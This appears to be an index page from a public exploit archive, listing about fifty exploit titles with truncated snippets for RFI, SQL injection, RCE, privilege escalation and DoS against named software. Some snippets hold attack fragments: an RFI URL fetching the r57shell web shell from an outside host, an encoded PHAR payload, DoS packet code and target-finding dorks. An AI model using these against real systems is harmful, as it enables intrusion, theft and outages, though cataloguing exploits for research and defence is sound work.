phpCodeGenie 3.0.2 - BEAUT_PATH Remote File Inclusion
phpCodeGenie 3.0.2 - BEAUT_PATH Remote File Inclusion. DEVIL TEAM THE BEST POLISH TEAM. phpCodeGenie app/common/lib/codeBeautifier/Beautifier/Core.php line 20-25: .... include_once($BEAUT_PATH."/Beautifier/HFile.php"); include_once($BEAUT_PATH."/Beautifier/Context.php"); class Core...
TSEP 0.942 - colorswitch.php Remote File Inclusion
TSEP 0.942 - colorswitch.php Remote File Inclusion Script: TSEP Comments: "register_globals" must be enabled duh. document.this != http://www.milw0rm.com/exploits/2098 Vulnerable Files/Code: ./tsep.0942/include/colorswitch.php?tsepconfigabsPath=http://rst.void.ru/download/r57shell.txt?...
LimeSurvey 3.16 - Remote Code Execution
LimeSurvey 3.16 - Remote Code Execution !/usr/bin/python Description: LimeSurvey shell.php" -p phar -o /tmp/exploit.jpg PHAR = "\x3c\x3f\x70\x68\x70\x20\x5f\x5f\x48\x41\x4c\x54\x5f\x43\x4f\x4d\x50\x49\x4c\x45\x52\x28\x29\x3b\x20\x3f\x3e\x0d\x0a\x38"...
FortiOS 5.6.3 - 5.6.7 FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure
FortiOS 5.6.3 - 5.6.7 FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure Exploit Title: FortiOS Leak file - Reading login/passwords in clear text. Google Dork: intext:"Please Login" inurl:"/remote/login" Date: 17/08/2019 Exploit Author: Carlos E. Vieira Vendor Homepage: https://www.fortinet.com/...
MidiCart PHP - Item_Show.php?Code_No SQL Injection
MidiCart PHP - Item_Show.php?Code_No SQL Injection source: https://www.securityfocus.com/bid/13515/info MidiCart PHP is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful...
ISC BIND 9 - TKEY (PoC)
ISC BIND 9 - TKEY PoC / PoC for BIND9 TKEY assert Dos CVE-2015-5477 Usage: tkill What it does: - First sends a "version" query to see if the server is up. - Regardless of the version response, it then sends the DoS packet. - Then it waits 5 seconds for a response. If the server crashes, there wil...
Webfroot Shoutbox 2.32 - Expanded.php Directory Traversal
Webfroot Shoutbox 2.32 - Expanded.php Directory Traversal source: https://www.securityfocus.com/bid/7775/info A problem in Shoutbox may result in traversal attacks. The vulnerability exists due to insufficient sanitization of user-supplied values to the expanded.php script, and could allow the...
Drupal 7.0 7.31 - Drupalgeddon SQL Injection (PoC) (Reset Password) (2)
Drupal 7.0 7.31 - Drupalgeddon SQL Injection (PoC) (Reset Password) (2) array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", 'content' => $postdata); $ctx = stream_context_create($params); $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);...
Advanced Guestbook - addentry.php Arbitrary File Upload
Advanced Guestbook - addentry.php Arbitrary File Upload source: https://www.securityfocus.com/bid/61735/info Advanced Guestbook is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An...
Broadcom Wi-Fi Devices - KR00K Information Disclosure
Broadcom Wi-Fi Devices - KR00K Information Disclosure Kr00ker Experimental KR00K PoC in python3 using scapy Description: This script is a simple experiment to exploit the KR00K vulnerability CVE-2019-15126, that allows to decrypt some WPA2 CCMP data in vulnerable devices. More specifically this...
PHP 5.6.2 - Shellshock Safe Mode disable_functions Bypass Command Injection
PHP 5.6.2 - Shellshock Safe Mode disable_functions Bypass Command Injection Exploit Title: PHP 5.x Shellshock Exploit bypass disable_functions Google Dork: none Date: 10/31/2014 Exploit Author: Ryan King Starfall Vendor Homepage: http://php.net Software Link:...
Grandstream UCM6200 Series CTI Interface - user_password SQL Injection
Grandstream UCM6200 Series CTI Interface - user_password SQL Injection Exploit Title: Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection Date: 2020-03-30 Exploit Author: Jacob Baines Vendor Homepage: http://www.grandstream.com/ Software Link:...
Easy RM to MP3 Converter 2.7.3.700 - Input Local Buffer Overflow (SEH)
Easy RM to MP3 Converter 2.7.3.700 - Input Local Buffer Overflow SEH Exploit Title: Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow SEH Date: 2020-03-26 Author: Felipe Winsnes Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.e...
Microsoft Windows Remote Desktop - BlueKeep Denial of Service (Metasploit)
Microsoft Windows Remote Desktop - BlueKeep Denial of Service Metasploit Exploit Title: Bluekeep Denial of Service metasploit module Shodan Dork: port:3389 Date: 07/14/2019 Exploit Author: RAMELLA Sebastien https://github.com/mekhalleh/ Vendor Homepage: https://microsoft.com Version: all affected...
Adobe Acrobat Reader - ASLR + DEP Bypass with Sandbox Bypass
Adobe Acrobat Reader - ASLR + DEP Bypass with Sandbox Bypass CVE-2013-0640/1 Somehow, our script got on to the Russian forums :/ @w3bd3vil and @abh1sek Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29881.tar.gz Adobe Acrobat Reader ASLR/DEP...
Libc - libc:fts_*() Local Denial of Service
Libc - libc:fts_*() Local Denial of Service. libc:fts:multiple vendors, Denial-of-service Author: Maksymilian Arciemowicz SecurityReason.com Date: Dis.: 21.10.2008, Pub.: 04.03.2009 CVE: CVE-2009-0537 We are going informing all vendors, about this...
PHP-Fusion - article_id SQL Injection
PHP-Fusion - article_id SQL Injection source: https://www.securityfocus.com/bid/47128/info PHP-Fusion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise...
Linux Kernel 3.10.0 (CentOS 7) - Denial of Service
Linux Kernel 3.10.0 CentOS 7 - Denial of Service / Exploit Title: CentOS7 Kernel Crashing by rsyslog daemon vulnerability | DOS on CentOS7 Exploit Author: Hosein Askari FarazPajohan Vendor HomePage: https://www.centos.org/ Version : 7 Tested on: Parrot OS Date: 12-2-2017 Category: Operating Syste...
ISC BIND 9 - Denial of Service
ISC BIND 9 - Denial of Service import socket import struct TARGET = '192.168.200.10', 53 QA = 1 QTSIG = 250 DNSMESSAGEHEADERLEN = 12 def buildbindnukequestion="\x06google\x03com\x00", udpsize=512: queryA = "\x8f\x65\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01" + question + int16QA + "\x00\x01"...
Microsoft Windows - Local Privilege Escalation (MS15-051)
Microsoft Windows - Local Privilege Escalation MS15-051 Source: https://github.com/hfiref0x/CVE-2015-1701 Win32k LPE vulnerability used in APT attack Original info: https://www.fireeye.com/blog/threat-research/2015/04/probableapt28useo.html Credits R136a1 / hfiref0x Compiled EXE: x86 +...
The Matt Wright Guestbook.pl 2.3.1 - Server-Side Include
The Matt Wright Guestbook.pl 2.3.1 - Server-Side Include $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...
Mambo Component CopperminePhotoGalery - Remote File Inclusion
Mambo Component CopperminePhotoGalery - Remote File Inclusion CopperminePhotoGallery Component Found By k1tk4t Indonesia This bug allows a remote attacker to execute commands via RFI file: cpg.php bug: require $mosConfig_absolute_path."/administrator/components/comcpg/config.cpg.php"; path: add in...
PHPNuke-Clan 4.2.0 - mvcw_conver.php Remote File Inclusion
PHPNuke-Clan 4.2.0 - mvcw_conver.php Remote File Inclusion. PHPNuke-Clan = v4.2.0 mvcw_conver.php Remote File Inclusion, coded by DNX. Discovered: DNX...
eMerge E3 Access Controller 4.6.07 - Remote Code Execution
eMerge E3 Access Controller 4.6.07 - Remote Code Execution Exploit Title: eMerge E3 Access Controller 4.6.07 - Remote Code Execution Google Dork: NA Date: 2018-11-11 Exploit Author: LiquidWorm Vendor Homepage: http://linear-solutions.com/nscfamily/e3-series/ Software Link:...
PHP Link Directory 4.1.0 - Cross-Site Request Forgery (Add Admin)
PHP Link Directory 4.1.0 - Cross-Site Request Forgery (Add Admin). PHP Link Directory v4.1.0 CSRF Vulnerability Add Admin. Author : AtT4CKxT3rR0r1ST Script : http://www.phplinkdirectory.com/ Dork : "Powered b...
UBBCentral UBB.Threads 6.4.x 6.5.2 - thispath Remote File Inclusion
UBBCentral UBB.Threads 6.4.x 6.5.2 - thispath Remote File Inclusion Anomaly 1n The System presents UBB.threads = 6.4.x Remote File Inclusion found by V4mu in 04/20/2006 URL: http://www.ubbcentral.com Google dork: allinurl:"/ubbthreads/" exploit:...
Comersus Backoffice 4.x5.06.0 - comersusdatabasecomersus.mdb Direct Request Database Disclosure
Comersus Backoffice 4.x5.06.0 - comersusdatabasecomersus.mdb Direct Request Database Disclosure source: https://www.securityfocus.com/bid/15251/info Comersus BackOfficePlus and BackOfficeLite are prone to multiple input validation and information disclosure vulnerabilities. The applications are...
IPS Community Suite 4.1.12.3 - PHP Code Injection
IPS Community Suite 4.1.12.3 - PHP Code Injection. IPS Community Suite contentclass ; 39. 40. if ( ! class_exists( $class ) or ! in_array( 'IPS\Content', class_parents( $class ) ) ) 41. 42. \IPS\Output::i()->error( 'nodeerror', '2S226/2', 404...
IPFire - CGI Web Interface (Authenticated) Bash Environment Variable Code Injection
IPFire - CGI Web Interface Authenticated Bash Environment Variable Code Injection !/usr/bin/env python Exploit Title : IPFire = 2.15 core 82 Authenticated cgi Remote Command Injection ShellShock Exploit Author : Claudio Viviani Vendor Homepage : http://www.ipfire.org Software Link:...
HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account
HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account Exploit Title: HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account Dork: N/A Date: 2020-02-03 Exploit Author: Snawoot Vendor Homepage: http://www.hisilicon.com Product Link: http://www.hisilicon.com/en/Products Version: hi3520d...
Annuaire PHP - sites_inscription.php Multiple Cross-Site Scripting Vulnerabilities
Annuaire PHP - sites_inscription.php Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/51434/info Annuaire PHP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage thes...
Exim 4.87 - 4.91 - Local Privilege Escalation
Exim 4.87 - 4.91 - Local Privilege Escalation !/bin/bash raptoreximwiz - "The Return of the WIZard" LPE exploit Copyright c 2019 Marco Ivaldi A flaw was found in Exim versions 4.87 to 4.91 inclusive. Improper validation of recipient address in delivermessage function in /src/deliver.c may lead to...
myPHPNuke Module My_eGallery 2.5.6 - basepath Remote File Inclusion
myPHPNuke Module My_eGallery 2.5.6 - basepath Remote File Inclusion. myPHPNuke Gallery Module basepath Remote File Include...
BIND 9.x - Remote DNS Cache Poisoning (Python)
BIND 9.x - Remote DNS Cache Poisoning Python from scapy import import random Copyright C 2008 Julien Desfossez http://www.solisproject.net/ This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software...
PHPCOIN 1.2.2 - includesdb.php?$_CCFG[_PKG_PATH_DBSE] Traversal Arbitrary File Access
PHPCOIN 1.2.2 - includesdb.php?$_CCFG[_PKG_PATH_DBSE] Traversal Arbitrary File Access source: https://www.securityfocus.com/bid/15831/info PhpCOIN is prone to a file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploi...
Jack (tR) Jax LinkLists 1.00 - jax_linklists.php Cross-Site Scripting
Jack (tR) Jax LinkLists 1.00 - jax_linklists.php Cross-Site Scripting source: https://www.securityfocus.com/bid/28518/info Jax LinkLists is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrar...
Nginx (Debian Based Distros + Gentoo) - logrotate Local Privilege Escalation
Nginx Debian Based Distros + Gentoo - logrotate Local Privilege Escalation !/bin/bash Nginx Debian-based distros + Gentoo - Root Privilege Escalation PoC Exploit nginxed-root.sh ver. 1.0 CVE-2016-1247 Discovered and coded by: Dawid Golunski dawidatlegalhackers.com https://legalhackers.com Follow...
FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)
FlashFXP 4.2.0 Build 1730 - Denial of Service PoC Exploit Title: FlashFXP 4.2.0 Build 1730 - Denial of Service PoC Vendor Homepage: https://www.flashfxp.com/ Software Link Download: https://www.filehorse.com/download-flashfxp/22451/download/ Exploit Author: Paras Bhatia Discovery Date: 2020-03-30...
BigACE 2.7.5 - Arbitrary File Upload
BigACE 2.7.5 - Arbitrary File Upload. Bigace 2.7.5 Remote Upload file Vulnerability. InformatioN Title : Bigace 2.7.5 Remote Upload file Vulnerability Author : Net.Edit0r Vendor or Software Link :...
Coppermine Photo Gallery 1.2.2b - theme.php Remote File Inclusion
Coppermine Photo Gallery 1.2.2b - theme.php Remote File Inclusion source: https://www.securityfocus.com/bid/10253/info Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the...
Yappa-ng 2.3.1 - admin_modules Remote File Inclusion
Yappa-ng 2.3.1 - admin_modules Remote File Inclusion. yappa-ng = v2.3.1 admin_modules Remote File Inclusion Exploit...
Zen Load Balancer 3.10.1 - Remote Code Execution
Zen Load Balancer 3.10.1 - Remote Code Execution Exploit Title: Zen Load Balancer 3.10.1 - Remote Code Execution Google Dork: no Date: 2020-03-28 Exploit Author: Cody Sixteen Vendor Homepage: https://code610.blogspot.com Software Link:...
Joomla! Component GMapFP 3.30 - Arbitrary File Upload
Joomla! Component GMapFP 3.30 - Arbitrary File Upload Exploit Title: Joomla! Component GMapFP 3.30 - Arbitrary File Upload Google Dork: inurl:''comgmapfp'' Date: 2020-03-25 Exploit Author: ThelastVvV Vendor Homepage:https://gmapfp.org/ Version: Version J3.30pro Tested on: Ubuntu PoC:...
Mozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack
Mozilla FireFox Windows 10 x64 - Full Chain Client Side Attack // Axel '0vercl0k' Souchet - November 19 2019 // EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47752.zip // 0:000 ? xul!sAutomationPrefIsSet - xul // Evaluate expression: 8572494...
PHPEasyData 1.5.4 - last_records.php?annuaire Cross-Site Scripting
PHPEasyData 1.5.4 - last_records.php?annuaire Cross-Site Scripting source: https://www.securityfocus.com/bid/29659/info PHPEasyData is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage the...
PHP-Nuke Module htmltonuke 2.0alpha - htmltonuke.php Remote File Inclusion
PHP-Nuke Module htmltonuke 2.0alpha - htmltonuke.php Remote File Inclusion htmltonuke 2.0alpha for postnuke & PHP-Nukehtmltonuke.php Remote File Include Vulnerabilities script :http://www.desarrollonuke.org http://up.9q9q.net/up/index.php?f=ddAvVTUSs file : /htmltonuke.php Dork :...
WeBid 0.7.3 RC9 - upldgallery.php Arbitrary File Upload
WeBid 0.7.3 RC9 - upldgallery.php Arbitrary File Upload. Author : Ahmad Pay Date : March, 25 2009 Location : Bojonegoro, Indonesia Critical : High Impact : System Access Where : From Remote...
Android - Binder Driver Use-After-Free
Android - Binder Driver Use-After-Free The following issue exists in the android-msm-wahoo-4.4-pie branch of https://android.googlesource.com/kernel/msm and possibly others: There is a use-after-free of the wait member in the binderthread struct in the binder driver at /drivers/android/binder.c. ...
Netis WF2419 2.2.36123 - Remote Code Execution
Netis WF2419 2.2.36123 - Remote Code Execution Exploit Title: Netis WF2419 2.2.36123 - Remote Code Execution Exploit Author: Elias Issa Vendor Homepage: http://www.netis-systems.com Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/75 Date: 2020-02-11 Version: WF2419 V2.2.361...
Exim 4.90.1 - base64d Remote Code Execution
Exim 4.90.1 - base64d Remote Code Execution !/usr/bin/python import time import socket import struct s = None f = None def logo: print print " CVE-2018-6789 Poc Exploit" print "@straightblast ; [email protected]" print def connecthost, port: global s global f s =...